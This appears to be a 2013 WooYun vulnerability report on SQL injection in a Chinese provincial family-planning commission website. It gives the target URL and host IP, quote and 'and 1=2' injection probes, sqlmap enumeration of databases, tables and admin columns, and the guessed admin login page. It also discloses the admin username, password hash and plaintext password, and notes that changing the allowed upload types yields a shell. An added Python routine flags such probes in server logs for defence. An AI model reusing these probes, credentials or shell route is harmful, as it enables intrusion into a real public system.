
Vulnerability summary

Defect ID: wooyun-2013-041328

Title: SQL injection and a weak password in the Liaoning Family Planning Commission site allow access to the admin backend

Vendor: Liaoning Family Planning Commission (辽宁计生委)

Author: 雅柏菲卡

Submitted: 2013-10-29 10:40

Fix deadline: 2013-12-13 10:41

Published: 2013-12-13 10:41

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 8

Status: Handed over to a third-party partner organization (CNCERT, the national internet emergency response center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2013-10-29: Details sent to the vendor; awaiting the vendor's handling
2013-11-02: Vendor confirmed; details visible to the vendor only
2013-11-12: Details disclosed to core white hats and experts in the relevant field
2013-11-22: Details disclosed to regular white hats
2013-12-02: Details disclosed to intern white hats
2013-12-13: Details disclosed to the public

Brief description:

......................

Detailed description:

......................

Proof of vulnerability:

SQL handling error
When a ' is appended to the id parameter:
http://www.lnrkjsw.gov.cn/web/content_hd.do?id=21922'
the page responds with the site's anti-attack warning banner:
攻击政府网站违法,您的ip已记录在案,系统自动将攻击详细记录提交到网警部门!我们保留追究的权利!
When and 1=2 is appended instead, the response is an ASP error:
错误 '80020009'
/web/content_hd.do,行 71
http://www.lnrkjsw.gov.cn/web/content_hd.do?id=21922%20and%201=2
while, as expected,
http://www.lnrkjsw.gov.cn/web/content_hd.do?id=21922%20and%201=1 returns the normal page.
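The probe sequence described above (a bare quote, then and 1=2 and and 1=1 against the same numeric id) is easy to pick out of IIS request logs. The following Python routine, an added example that is not part of the original report, scans constructed W3C-style log lines for content_hd.do requests whose id parameter is not a plain integer and flags clients that sent the true/false pair; the log layout, the sample lines and the IP addresses are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs

# Constructed IIS W3C-style log lines: date time cs-uri-stem cs-uri-query c-ip sc-status.
# The id values mirror the probes described in the report; the IPs are documentation-range placeholders.
SAMPLE_LOG = """\
2013-10-29 03:40:01 /web/content_hd.do id=21922 198.51.100.7 200
2013-10-29 03:40:05 /web/content_hd.do id=21922' 198.51.100.7 200
2013-10-29 03:40:09 /web/content_hd.do id=21922%20and%201=2 198.51.100.7 500
2013-10-29 03:40:12 /web/content_hd.do id=21922%20and%201=1 198.51.100.7 200
2013-10-29 03:41:00 /web/content_hd.do id=21923 203.0.113.5 200
2013-10-29 03:41:30 /admin/admin_login.asp - 198.51.100.7 200
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (?P<stem>\S+) (?P<query>\S+) (?P<ip>\S+) (?P<status>\d+)$")
INTEGER_RE = re.compile(r"[0-9]+")
BOOL_PROBE_RE = re.compile(r"\band\s+1\s*=\s*([12])\b", re.IGNORECASE)


def suspicious_id_values(log_text, stem="/web/content_hd.do"):
    """Map client IP -> decoded id values sent to `stem` that are not a plain integer.
    content_hd.do only needs a numeric id, so a quote, a boolean tail or any other
    non-digit content in that parameter is worth an alert on its own."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["stem"] != stem or m["query"] == "-":
            continue
        # parse_qs percent-decodes once, so "21922%20and%201=2" becomes "21922 and 1=2".
        for value in parse_qs(m["query"], keep_blank_values=True).get("id", []):
            if not INTEGER_RE.fullmatch(value):
                hits[m["ip"]].append(value)
    return dict(hits)


def boolean_probe_ips(log_text, stem="/web/content_hd.do"):
    """IPs that sent both an 'and 1=1' and an 'and 1=2' variant to `stem`: one true
    and one false condition on the same id is the manual confirmation step shown in
    the proof above, so it deserves a higher-priority alert than a lone quote."""
    seen = defaultdict(set)
    for ip, values in suspicious_id_values(log_text, stem).items():
        for value in values:
            probe = BOOL_PROBE_RE.search(value)
            if probe:
                seen[ip].add(probe.group(1))
    return sorted(ip for ip, variants in seen.items() if variants == {"1", "2"})
```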

SQL injection

Target: 		http://www.lnrkjsw.gov.cn/web/content_hd.do?id=21922
Host IP: 218.60.144.144
Web Server: Microsoft-IIS/6.0
Powered-by: ASP.NET
DB Server: MSSQL 2005 with error
Resp. Time(avg): 406 ms
Current User: jishengwei
Sql Version: Microsoft SQL Server 2000 - 8.00.2039 (Intel X86)
May 3 2005 23:18:38
Copyright (c) 1988-2003 Microsoft Corporation
Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
Current DB: jsw2010
System User: jishengwei
Host Name: JSW
Server Name: JSW
jsw2010
Data Bases: master
tempdb
model
msdb
pubs
Northwind
jsw2010
count
Table enumeration with sqlmap:
available databases [8]:
[*] count
[*] jsw2010
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
Database: jsw2010
[110 tables]
+---------------------------+
| dbo.PE_AdZone |
| dbo.PE_Admin |
| dbo.PE_Advertisement |
| dbo.PE_Announce |
| dbo.PE_AreaCollection |
| dbo.PE_Article |
| dbo.PE_Article11 |
| dbo.PE_Author |
| dbo.PE_Bank |
| dbo.PE_BankrollItem |
| dbo.PE_Card |
| dbo.PE_Channel |
| dbo.PE_City |
| dbo.PE_Class |
| dbo.PE_Class11 |
| dbo.PE_Classroom |
| dbo.PE_Client |
| dbo.PE_Comment |
| dbo.PE_Company |
| dbo.PE_ComplainItem |
| dbo.PE_Config |
| dbo.PE_ConsumeLog |
| dbo.PE_Contacter |
| dbo.PE_CopyFrom |
| dbo.PE_Country |
| dbo.PE_DeliverCharge |
| dbo.PE_DeliverItem |
| dbo.PE_DeliverType |
| dbo.PE_Dictionary |
| dbo.PE_DownError |
| dbo.PE_DownServer |
| dbo.PE_Equipment |
| dbo.PE_Favorite |
| dbo.PE_Field |
| dbo.PE_Filters |
| dbo.PE_Friend |
| dbo.PE_FriendSite |
| dbo.PE_FsKind |
| dbo.PE_GuestBook |
| dbo.PE_GuestKind |
| dbo.PE_HistrolyNews |
| dbo.PE_HouseArea |
| dbo.PE_HouseCS |
| dbo.PE_HouseCZ |
| dbo.PE_HouseConfig |
| dbo.PE_HouseHZ |
| dbo.PE_HouseQG |
| dbo.PE_HouseQZ |
| dbo.PE_InfoS |
| dbo.PE_InvoiceItem |
| dbo.PE_Item |
| dbo.PE_JobCategory |
| dbo.PE_JsFile |
| dbo.PE_KeyLink |
| dbo.PE_Label |
| dbo.PE_Log |
| dbo.PE_MailChannel |
| dbo.PE_Message |
| dbo.PE_NewKeys |
| dbo.PE_OrderForm |
| dbo.PE_OrderFormItem |
| dbo.PE_Page |
| dbo.PE_PageClass |
| dbo.PE_PayPlatform |
| dbo.PE_Payment |
| dbo.PE_PaymentType |
| dbo.PE_Photo |
| dbo.PE_Position |
| dbo.PE_PositionSupplyInfo |
| dbo.PE_PresentProject |
| dbo.PE_Producer |
| dbo.PE_Product |
| dbo.PE_Province |
| dbo.PE_RechargeLog |
| dbo.PE_Resume |
| dbo.PE_ServiceItem |
| dbo.PE_ShoppingCarts |
| dbo.PE_Skin |
| dbo.PE_Soft |
| dbo.PE_Space |
| dbo.PE_SpaceBook |
| dbo.PE_SpaceComment |
| dbo.PE_SpaceDiary |
| dbo.PE_SpaceKind |
| dbo.PE_SpaceLink |
| dbo.PE_SpaceMusic |
| dbo.PE_SpacePhoto |
| dbo.PE_SpaceVisitor |
| dbo.PE_Special |
| dbo.PE_SubCompany |
| dbo.PE_Supply |
| dbo.PE_Supply_Company |
| dbo.PE_Survey |
| dbo.PE_SurveyAnswer |
| dbo.PE_SurveyInput |
| dbo.PE_SurveyQuestion |
| dbo.PE_Template |
| dbo.PE_TemplateProject |
| dbo.PE_Trademark |
| dbo.PE_TransferItem |
| dbo.PE_UsedDetail |
| dbo.PE_User |
| dbo.PE_UserGroup |
| dbo.PE_Vote |
| dbo.PE_WorkPlace |
| dbo.dtproperties |
| dbo.netservices |
| dbo.sysconstraints |
| dbo.syssegments |
| dbo.tongji |
+---------------------------+
Database: jsw2010
Table: dbo.PE_Admin
[31 columns]
+------------------------+----------+
| Column | Type |
+------------------------+----------+
| AdminName | bit |
| AdminPurview_Article | bit |
| AdminPurview_GuestBook | bit |
| AdminPurview_House | bit |
| AdminPurview_Job | bit |
| AdminPurview_Others | bit |
| AdminPurview_Photo | bit |
| AdminPurview_Shop | bit |
| AdminPurview_Soft | bit |
| AdminPurview_Supply | bit |
| arrClass_Check | bit |
| arrClass_GuestBook | bit |
| arrClass_House | bit |
| arrClass_Input | bit |
| arrClass_Manage | bit |
| arrClass_View | bit |
| Count_Add | bit |
| Count_Check | bit |
| Count_Reject | bit |
| EnableMultiLogin | bit |
| ID | datetime |
| LastLoginIP | datetime |
| LastLoginTime | datetime |
| LastLogoutTime | datetime |
| LoginTimes | int |
| Password | int |
| Purview | int |
| RndPassword | nvarchar |
| RoleName | nvarchar |
| topname | nvarchar |
| UserName | nvarchar |
+------------------------+----------+
Table enumeration with Pangolin:

[Screenshot: QQ截图20131029035721.jpg]


The backend login page was found by guessing:
http://www.lnrkjsw.gov.cn/admin/admin_login.asp


Weak password
Username: admin
Password hash: f64793875b2204cf (decodes to the plaintext password admin888888)


The backend is accessible, and the permitted upload file types can be changed there, which allows getting a shell.

[Screenshot: QQ截图20131029040255.jpg]

Remediation:

Copyright notice: when reproducing, please credit the source 雅柏菲卡@WooYun


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2013-11-02 19:57

Vendor reply:

Latest status:

None yet